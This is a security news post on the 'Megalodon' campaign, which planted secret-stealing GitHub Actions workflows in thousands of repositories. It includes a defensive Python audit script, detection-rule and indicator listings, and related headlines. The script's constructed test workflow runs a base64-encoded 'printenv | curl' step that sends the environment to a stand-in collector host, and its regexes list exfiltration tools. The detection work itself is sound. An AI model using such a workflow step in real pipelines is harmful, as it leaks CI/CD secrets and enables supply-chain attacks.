Megalodon GitHub Attack: 5,561 Repos Hit with Malicious CI/CD Workflows

The Hacker News reports a new automated campaign, dubbed Megalodon, that injected 5,718 malicious commits into 5,561 GitHub repositories within a mere six-hour window. This isn’t some casual defacement; the attacker leveraged throwaway accounts and forged author identities like “build-bot” and “ci-bot” to inject GitHub Actions workflows. The payload? Base64-encoded bash scripts designed to exfiltrate CI/CD secrets and environment variables.

This attack vector is insidious. By mimicking legitimate automation accounts, the attacker blends in, making detection difficult. The exfiltration of CI/CD secrets means direct access to deployment pipelines, source code, and potentially production environments. This isn’t just about stealing code; it’s about owning the entire build and deploy process, opening doors to supply chain attacks or even direct system compromise.

Defenders need to assume their CI/CD environments are prime targets. The attacker’s calculus is clear: compromise the automation, compromise everything it touches. This is a direct attack on the integrity of software development and deployment. Relying solely on code review won’t catch this if the workflow itself is subverted.

What This Means For You

  • If your organization uses GitHub Actions or any CI/CD pipeline, you need to immediately audit all workflows for unauthorized changes, especially those introduced by bot-like accounts. Specifically, look for newly added base64-encoded bash payloads. Revoke any CI/CD secrets that may have been exposed and rotate all credentials used by your build processes. This isn't a hypothetical threat; it's an active campaign exploiting a critical trust boundary.
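The audit described above can be scripted. The following is an added example written for this page, not code from The Hacker News, from Shimi's Cyber World or from GitHub: it applies two checks to a set of workflow files and commit records, (1) steps that decode base64 and pipe the result into a shell, plus any long base64 run that decodes to a script that collects the environment or secrets, and (2) commits to `.github/workflows/` whose author name imitates an automation account ("build-bot", "ci-bot") without being on an allowlist. The workflow contents, commit records, collector hostname and the `KNOWN_BOTS` allowlist are all constructed or hypothetical for the demonstration.

```python
"""Audit GitHub Actions workflows and commit history for the indicators named in the
article: bot-like authors changing workflow files, and base64-encoded bash payloads that
decode to environment/secret exfiltration. Added example; all sample input is constructed."""
import base64
import re
from typing import List, NamedTuple, Optional

# Hypothetical allowlist: automation identities your organization actually runs.
KNOWN_BOTS = {"dependabot[bot]", "github-actions[bot]"}
# Names that imitate automation accounts (the article cites "build-bot" and "ci-bot").
BOT_LIKE = re.compile(r"(?i)\b(ci|build|deploy|release)[-_ ]?bot\b|\[bot\]$")
# Decode-and-execute pipelines such as `echo <blob> | base64 -d | bash`.
DECODE_EXEC = re.compile(r"base64\s+(-d|--decode)\b[^|\n]*\|\s*(ba)?sh\b")
# A long run of the base64 alphabet; legitimate `run:` steps rarely contain one.
LONG_B64 = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
# Pinned action SHAs are hex, which is also valid base64: exclude them explicitly.
HEX_ONLY = re.compile(r"[0-9a-fA-F]+")
# Commands a decoded payload would use to collect and ship environment or secrets.
EXFIL = re.compile(r"\b(curl|wget|nc)\b|\bprintenv\b|\benv\s*\||secrets")

Finding = NamedTuple("Finding", [("file", str), ("line", int), ("rule", str), ("detail", str)])

def try_decode(blob: str) -> Optional[str]:
    """Return decoded text only if blob is valid base64 that decodes to printable
    text; hex SHAs and binary noise come back as None."""
    if HEX_ONLY.fullmatch(blob):
        return None
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
        text = raw.decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\r\n\t" for c in text) else None

def scan_workflow(path: str, text: str) -> List[Finding]:
    """Flag decode-and-execute steps and embedded base64 blobs in one workflow file."""
    findings: List[Finding] = []
    for n, line in enumerate(text.splitlines(), 1):
        if DECODE_EXEC.search(line):
            findings.append(Finding(path, n, "decode-and-execute", line.strip()))
        for m in LONG_B64.finditer(line):
            decoded = try_decode(m.group(0))
            if decoded is None:
                continue
            rule = "encoded-exfil-script" if EXFIL.search(decoded) else "encoded-blob"
            findings.append(Finding(path, n, rule, decoded.strip()[:80]))
    return findings

def suspicious_authors(commits: List[dict]) -> List[dict]:
    """Commits that touch .github/workflows/ under a bot-like author not on the allowlist."""
    return [
        c for c in commits
        if any(p.startswith(".github/workflows/") for p in c["files"])
        and c["author"] not in KNOWN_BOTS
        and BOT_LIKE.search(c["author"])
    ]

# --- constructed sample input: a one-line script that dumps the environment to a
# made-up collector host, the behaviour the article attributes to the Megalodon payload.
_SAMPLE_BLOB = base64.b64encode(
    b"printenv | curl -s -X POST --data-binary @- https://collector.example/"
).decode()

MALICIOUS_WF = f"""name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - run: echo {_SAMPLE_BLOB} | base64 -d | bash
"""

CLEAN_WF = """name: ci
on: [push]
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - run: pip install -r requirements.txt && pytest
"""

SAMPLE_COMMITS = [  # constructed; shape matches `git log --name-only` after parsing
    {"sha": "aaaa111", "author": "build-bot", "files": [".github/workflows/ci.yml"]},
    {"sha": "bbbb222", "author": "dependabot[bot]", "files": ["package.json"]},
    {"sha": "cccc333", "author": "alice", "files": ["src/main.py"]},
    {"sha": "dddd444", "author": "ci-bot", "files": [".github/workflows/release.yml"]},
]

if __name__ == "__main__":
    for path, text in {"ci.yml": MALICIOUS_WF, "test.yml": CLEAN_WF}.items():
        for f in scan_workflow(path, text):
            print(f"{f.file}:{f.line} [{f.rule}] {f.detail}")
    print("commits to review:", [c["sha"] for c in suspicious_authors(SAMPLE_COMMITS)])
```

In practice the two functions are fed with every file under `.github/workflows/` and the parsed output of `git log --name-only` for each repository. The hex exclusion matters: a pinned action SHA is 40 hexadecimal characters, which sits entirely inside the base64 alphabet and would otherwise be reported as an encoded blob in almost every hardened workflow.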

Related ATT&CK Techniques

T1505 (Persistence)

🛡️ Detection Rules

Three detection rules were auto-generated for this incident and mapped to MITRE ATT&CK. They are published as Sigma YAML and can be exported to Splunk SPL, Sentinel KQL, Elastic, QRadar AQL and Wazuh formats. The previewed rule:

Megalodon Malicious GitHub Actions Workflow Injection (severity: critical; ATT&CK T1505, Persistence)

Source: Shimi's Cyber World

Indicators of Compromise

ID                        Type                    Indicator
Megalodon-GitHub-Attack   Code Injection          GitHub Actions workflows containing base64-encoded bash payloads
Megalodon-GitHub-Attack   Information Disclosure  Exfiltration of CI/CD secrets
Megalodon-GitHub-Attack   Misconfiguration        Compromised GitHub repositories (5,561 affected)
Related coverage on GitHub

Ghostwriter Targets Ukraine Government with Prometheus Phishing

The Belarus-aligned threat actor, Ghostwriter (also tracked as UAC-0057 and UNC1151), is actively targeting Ukrainian government entities. According to The Hacker News, this group is...


Huawei Router Flaw Triggered Telecom Blackout, SecurityWeek Reports

SecurityWeek reports on a critical flaw in Huawei routers that led to a significant telecom blackout. While details are sparse, the incident underscores the inherent...


Trend Micro Apex One Zero-Day Under Active Exploitation

Trend Micro has confirmed a zero-day vulnerability in its Apex One security product, actively exploited on Windows systems. BleepingComputer reports that this critical flaw allows...
